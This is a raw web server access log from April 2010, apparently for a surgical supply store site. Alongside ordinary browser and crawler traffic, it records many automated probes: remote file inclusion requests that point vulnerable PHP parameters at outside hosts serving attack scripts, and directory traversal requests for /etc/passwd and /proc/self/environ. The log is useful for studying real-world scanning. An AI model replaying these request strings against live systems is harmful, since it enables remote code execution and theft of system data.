67.195.114.252 - - [07/Apr/2010:06:07:37 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [07/Apr/2010:06:07:48 -0400] "GET /2008.itcweb.co.uk HTTP/1.1" 404 215 "-" "Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [07/Apr/2010:06:07:51 -0400] "GET ///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:07:51 -0400] "GET /logs/access_log.Q109072400%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:07:51 -0400] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:07:54 -0400] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:07:54 -0400] "GET ///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:02 -0400] "GET /logs/access_log.Q109072400%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:06:07:37 -0400] "GET /logs/error_log.Q110030200 HTTP/1.0" 200 3913755 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.25.185.25 - - [07/Apr/2010:06:08:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6.4)"
80.25.185.25 - - [07/Apr/2010:06:08:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6.4)"
80.25.185.25 - - [07/Apr/2010:06:08:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6.4)"
80.25.185.25 - - [07/Apr/2010:06:08:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6.4)"
195.242.198.226 - - [07/Apr/2010:06:08:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
195.242.198.226 - - [07/Apr/2010:06:08:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
88.191.94.188 - - [07/Apr/2010:06:08:41 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:41 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:41 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:42 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:42 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:42 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.242.198.226 - - [07/Apr/2010:06:08:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:08:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
88.191.94.188 - - [07/Apr/2010:06:08:50 -0400] "GET /logs/error_log.Q109090800%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:08:55 -0400] "GET /logs/error_log.Q109090800%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.242.198.226 - - [07/Apr/2010:06:09:02 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol HTTP/1.1" 200 38022 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:04 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:04 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:04 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:05 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:05 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:05 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:05 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:06 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:06 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:06 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:06 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:06 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:09 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:09 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:10 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:10 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:10 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:10 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:10 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:11 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:11 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:11 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:11 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
195.242.198.226 - - [07/Apr/2010:06:09:12 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET /logs/error_log.Q109073100//include/footer.php?_path[counter]=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET //include/footer.php?_path[counter]=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET //include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET /logs//include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET /logs/error_log.Q109073100//include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET //include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET /logs/error_log.Q109073100//include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:22 -0400] "GET /logs//include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:23 -0400] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:23 -0400] "GET /logs/error_log.Q109073100/errors.php?error=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:09:23 -0400] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
88.191.94.188 - - [07/Apr/2010:06:09:45 -0400] "GET /logs/error_log.Q109090800%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:09:46 -0400] "GET /logs/error_log.Q109090800%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:04 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:04 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:04 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:04 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:04 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:04 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.125.44.136 - - [07/Apr/2010:06:10:39 -0400] "GET /logs/access_log.Q110022700/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
202.125.44.136 - - [07/Apr/2010:06:10:42 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
202.125.44.136 - - [07/Apr/2010:06:10:43 -0400] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
202.125.44.136 - - [07/Apr/2010:06:10:47 -0400] "GET /logs/access_log.Q110020700/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
88.191.94.188 - - [07/Apr/2010:06:10:54 -0400] "GET /logs/error_log.Q109090800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:10:56 -0400] "GET /logs/error_log.Q109090800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:06:10:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.88.4.74 - - [07/Apr/2010:06:11:24 -0400] "GET /logs/access_log.Q110020700/components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:11:50 -0400] "GET /images/_notes/nav_store_fav_over_r1_c3.jpg.mno HTTP/1.1" 200 210 "-" "Yandex/1.01.001 (compatible; Win16; I)"
203.19.4.18 - - [07/Apr/2010:06:11:53 -0400] "GET /logs/access_log.Q109062800//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
80.246.53.10 - - [07/Apr/2010:06:12:02 -0400] "GET /logs/error_log.Q109100900//include/footer.php?_path[counter]=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:12:02 -0400] "GET /logs/error_log.Q109100900//include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:12:02 -0400] "GET /logs/error_log.Q109100900//include/footer.php?_path[counter]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:06:12:03 -0400] "GET /logs/error_log.Q109100900/errors.php?error=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.249.65.179 - - [07/Apr/2010:06:12:11 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0199305638C145009F4B02H+WSEQ(S0060):1+OUITEM(A0200):45427206 HTTP/1.1" 200 27015 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.114.252 - - [07/Apr/2010:06:13:27 -0400] "GET /logs/access_log.Q109112900 HTTP/1.0" 200 2295103 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.78.125.169 - - [07/Apr/2010:06:14:31 -0400] "GET /logs/error_log.Q110032400//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
189.78.125.169 - - [07/Apr/2010:06:14:33 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
189.78.125.169 - - [07/Apr/2010:06:14:35 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
121.88.4.74 - - [07/Apr/2010:06:14:38 -0400] "GET /logs/access_log.Q110030500/components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
203.19.4.18 - - [07/Apr/2010:06:15:50 -0400] "GET /logs/access_log.Q109062500//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
95.108.128.242 - - [07/Apr/2010:06:15:51 -0400] "GET /_img/_flash/phone.swf HTTP/1.1" 404 219 "-" "Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [07/Apr/2010:06:17:25 -0400] "GET /logs/access_log.Q109072400///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:17:50 -0400] "GET /logs/error_log.Q109090800///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.121.17.40 - - [07/Apr/2010:06:17:56 -0400] "GET /index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "-"
174.121.17.40 - - [07/Apr/2010:06:17:57 -0400] "GET /logs/error_log.Q109100900%20/index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "-"
174.121.17.40 - - [07/Apr/2010:06:17:57 -0400] "GET /logs/index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "-"
174.121.17.40 - - [07/Apr/2010:06:17:57 -0400] "GET /logs/error_log.Q109100900%20/index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 234 "-" "-"
174.121.17.40 - - [07/Apr/2010:06:17:57 -0400] "GET /logs/index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "-"
174.121.17.40 - - [07/Apr/2010:06:17:57 -0400] "GET /index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "-"
